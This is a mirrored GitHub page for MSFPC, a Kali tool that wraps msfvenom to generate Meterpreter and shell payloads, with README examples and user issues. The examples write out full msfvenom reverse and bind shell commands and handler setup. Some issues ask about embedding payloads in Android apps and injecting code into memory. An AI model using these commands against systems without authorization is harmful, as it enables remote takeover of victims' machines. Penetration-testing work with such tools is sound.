g0tmi1k / msfpc Goto Github PK

View Code? Open in Web Editor NEW

1.2K 80.0 269.0 68 KB

MSFvenom Payload Creator (MSFPC)

Home Page: https://blog.g0tmi1k.com/

License: MIT License

Shell 100.00%

msfvenom msfvenom-payload mpc msfpc payload payload-generator payload-generation metasploit-framework metasploit kali

msfpc's Introduction

MSFvenom Payload Creator (MSFPC)

A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

About

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
Don't know what your external IP is? MSFPC will discover it: wan.
Want to generate one of each payload? No issue! Try: loop.
Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.

## Install

Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.
Kali v1.x should work.
OSX 10.11+ should work.
Weakerth4n 6+ should work.
...nothing else has been tested.

$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Kali-Linux

MSFPC is already packaged in Kali Rolling, so all you have to-do is:

root@kali:~# apt install -y msfpc

## Help

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
            msfpc.sh help verbose                # Help screen, with even more information.

 <TYPE>:
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]
   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
 Missing <DOMAIN/IP> will default to the IP menu.

 Missing <PORT> will default to 443.

 <CMD> is a standard/native command prompt/terminal to interactive with.
 <MSF> is a custom cross platform shell, gaining the full power of Metasploit.
 Missing <CMD/MSF> will default to <MSF> where possible.
   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 Missing <BIND/REVERSE> will default to <REVERSE>.
 <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 <STAGED> are 'better' in low-bandwidth/high-latency environments.
 <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 <LOOP> will just create one of each <TYPE>.

 <VERBOSE> will display more information.
$

Example #1 (Windows, Fully Automated Using Manual IP)

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
  > '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #3 (Python Format, Interactive IP Menu)

$ msfpc stageless cmd py tcp
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 [i] Use which interface - IP address?:
 [i]   1.) eth0 - 192.168.103.142
 [i]   2.) lo - 127.0.0.1
 [i]   3.) wan - 31.204.154.174
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.142
 [i] PORT: 443
 [i] TYPE: python (python/shell_reverse_tcp)
 [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
  > '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)

$ ./msfpc.sh loop wan
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i] Loop Mode. Creating one of each TYPE, with default values

 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: xxx.xxx.xxx.xxx
 [i] PORT: 443
 [i] TYPE: android (android/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
  > '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!


 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

 [*] Done!

$

Note: Removed WAN IP.

To-Do List

Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

msfpc's People

Contributors

Stargazers

Watchers

Forkers

johnjohnsp1 kevin25 yd0str theralfbrown nootropics besimaltnok 00derp pentestit hotelzululima peterpt 0x0mar paran0ids0ul sathisharthar lucabongiorni zigitax meteoradminz yugoslavskiy jbarcia webkodex programming086 royharoush pr0xych41ns danielrteixeira hanshaze eniac888 phpplay fl3xu5 yeyintminthuhtut vasco2016 kaicastledine kbahaxor coffeehb tink2hack ub3rsick x42en bl4ck0psn1nj4 dhawal89 benichmt1 welllima88 hax0rg1rl offseccat infinitelabs olivierh59500 imertayak fr34k8 ehl0s parth2699 alpah7 sopsmattw bruhman5thflo katsoo2 ajmartel mgcfish houcy socketpy kernelsmith hktalent buglessdr greatunclebulgaria maskedfox techbytom awesome-security moriarty2016 esc0rtd3w nullport m41doror grukz mattparksdev 0patch snollyg0st3r h0r57 altune mrread kcsec bl3ck0ps shasthojoy w0rtw0rt comahax ykankaya ashr corleanus mrtaheramine shellcode-hex-backdoor-tools ro9ueadmin brianelugan99 wolfwhoami c4ri0c4 raymondseger c002 mrcalv1n gladiopeace shalekesan yuhisern7 leslieetubo charles08 akapitbull madenki infenet m4rkh0r git3web

msfpc's Issues

BUG: unable to find IP

Hi,
I've just setup the rolling repo and upgraded and it looks like the new ifconfig version is preventing MPC from identifying the IP on the interfaces.

root@kaliiso:/var/github/royharoush/mpc# ./mpc.sh [*] Msfvenom Payload Creator (MPC v1.4) [i] Something went wrong. Couldn't discover IP addresses. =( [i] Need to manually define it. ./mpc.sh --ip <IP>
even when defining an IP manually it won't work.

root@kaliiso:/var/github/royharoush/mpc# ./mpc.sh --ip 10.10.10.10 [*] Msfvenom Payload Creator (MPC v1.4) [i] Something went wrong. Couldn't discover IP addresses. =( [i] Need to manually define it. ./mpc.sh --ip <IP>

the new ifconfig output is shown in this format:

the old one:

obviously this isn't really an issue since we can only keep using the old repo, at least for a while.
just thought you should know.

Roy

Great Tool Ever

Hi Master,

This is not an issue! We are not able to contact you, so I want to give you something from here. We found a great article about this tool so that you can share it as a ref at the end of your tool.
https://secnhack.in/msfpc-create-payload-for-android-windows-and-more/

Embeding malicious apk into original apk

I was Unable to embed the malicious apk into the original one although java jdk and ap tool all are up to date so what is the problem?

how does msfvenom generate those assembly bytes from a c/c++ payload?

the msfvenom tool, using this command ex: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp. will generates bytes of assembly of the a payload written in C language.

i've been looking for a way to do this with my cpp payload for 7days but i found nothing about this online. i have a payload written in cpp but i want to inject it into memory and execute it in a new process.

i've compiled it into an exe and injected it using a complexe way but it caused many isues, and after solving solving those issues the app still give an error from time to time, i guess it's because injecting an exe binary is a lot difficult than i thought.

so i thought the way that msfvenom does it is easier and better. but i've stuck with it for 7 days with no result. i thought i could just write the whole payload in assembly but wfter relizing that the size of the payload reached 200kb i said no way.

again i thought that i could just copy the assembly bytes from the dissassembly window in VisualStudio, but a guy in stackoverflow told me that it's not going to work you need to write it manually in assembly or code it in hex manually using instructions reference. i don't know what the second option means but manually is definitelly a hard-way of doing it.

but how does the msfvenom do it automatically???
how does msfvenom generate those assembly bytes from a c/c++ payload?

Msfpc

Question

Hello I have a question.
I inject payload in app with msfvenom.

When I install app infected in my Android it doesn't ask for any permission...

There is a way to resolve this problem??

Thanks.

Add support for MacOS?

On Mac OS, msfpc behaves differently from on Linux.

Could the support on MacOS be added? Thanks.

$ ./msfpc.sh 
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
ifconfig: invalid option -- 'u'
Try 'ifconfig --help' or 'ifconfig --usage' for more information.
 [i] Something went wrong. Couldn't find any network interfaces
 [i] Need to manually define an IP.   ./msfpc.sh --ip <IP>

APK payload

Hope a option to create a APK payload is added

exe-service windows format

AFAICT, there's no way to have mpc build a service exe (vs a standard exe). The msfvenom command would be msfvenom -p blah -f exe-service

I made the changes to accommodate it, testing now, want a PR?

unloadable payload

Hello,
Does anyone have any insight about this error, because i cant find any the same related issue.

The error says Error: Unloadable payload , everytime i try to build any payload

Issue with MPC

https://stackoverflow.com/questions/36451848/msfvenom-payload-creator-how-to-create-a-payload-for-a-x64-architectures-targ

^ This showed up in stack overflow, just wanted to give you a heads up @g0tmi1k

Error creating file in MSF 4.10

The generated cmd for msfvenom in lines 360-558 use "-o outputfile" which is not supported with msf 4.10. A quick change to "> outputfile" will fix the issue.

Cheers. I put 1 beer on your tab...

Add option to specify custom IP/hostname for payload

Thanks for your hard work on this script!
Would it be possible to add an option to specify a different IP or a domain when selecting ip address (eth interface) use? Some complex setups mean we use diff IP addresses to those of the interfaces

Also will 64bit payloads be supported?

payload was unable to create

root@kali:/home/Downloads/msfpc# ./msfpc.sh windows 192.168.1.9
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 192.168.1.9
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe
--platform windows -a x86 -e generic/none LHOST=192.168.1.5 LPORT=443 \

'/home/Downloads/msfpc/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] Something went wrong. Issue creating file =(.

Could not find nokogiri-1.10.8 in any of the sources
Run `bundle install` to install missing gems.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

/usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:86:in `block in materialize': Could not find nokogiri-1.10.8 in any of the sources (Bundler::GemNotFound) from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in` map!'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in `materialize' from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:170:in` specs'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:237:in `specs_for' from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:226:in` requested_specs'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:101:in `block in definition_method' from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:20:in` setup'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler.rb:149:in `setup' from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in` block in <top (required)>'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:136:in `with_level' from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:88:in` silence'
from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `<top (required)>' from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in` require'
from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require' from /usr/share/metasploit-framework/config/boot.rb:28:in` <top (required)>'
from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require' from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in` require'
from /usr/share/metasploit-framework/lib/msfenv.rb:12:in `<top (required)>' from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in` require'
from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in `require' from /usr/bin/msfvenom:18:in` require_deps'
from /usr/bin/msfvenom:36:in `init_framework' from /usr/bin/msfvenom:55:in` framework'
from /usr/bin/msfvenom:446:in `'

i have installed nokogiri-1.10.8 still showing same error.
i am using Kali Linux 2019.3 amd64

Thank You

Iterations possible?

Is there a way to add the number of iterations I want from the encoder? I may have missed it, but I looked all through the documentation and the help.

he payload could not be generated, check options

hello i am new to this whole thing and was trying to create a payload i am following this tutorial https://www.youtube.com/watch?v=rY07SB7Y9mw but instead of the windows reverse tcp metaterpreter framework i was using the android this is the code i used: msfvenom -p android/meterpreter_reverse_tcp LOCALHOST=my ip was here LPORT=443 -f exe > outl.exe but when i executed it i got [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 80454 bytes
Error: The payload could not be generated, check options
and it didn't create the payload so i am new to this thing and would love some help. i am on kali linux

g0tmi1k / msfpc Goto Github PK

msfpc's Introduction

MSFvenom Payload Creator (MSFPC)

About

Kali-Linux

Example #1 (Windows, Fully Automated Using Manual IP)

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)

Example #3 (Python Format, Interactive IP Menu)

Example #4 (Loop - Generates one of everything)

To-Do List

msfpc's People

Contributors

Stargazers

Watchers

Forkers

msfpc's Issues

Could not find nokogiri-1.10.8 in any of the sources Run bundle install to install missing gems. Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Recommend Projects

Recommend Topics

Recommend Org

Could not find nokogiri-1.10.8 in any of the sources
Run `bundle install` to install missing gems.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux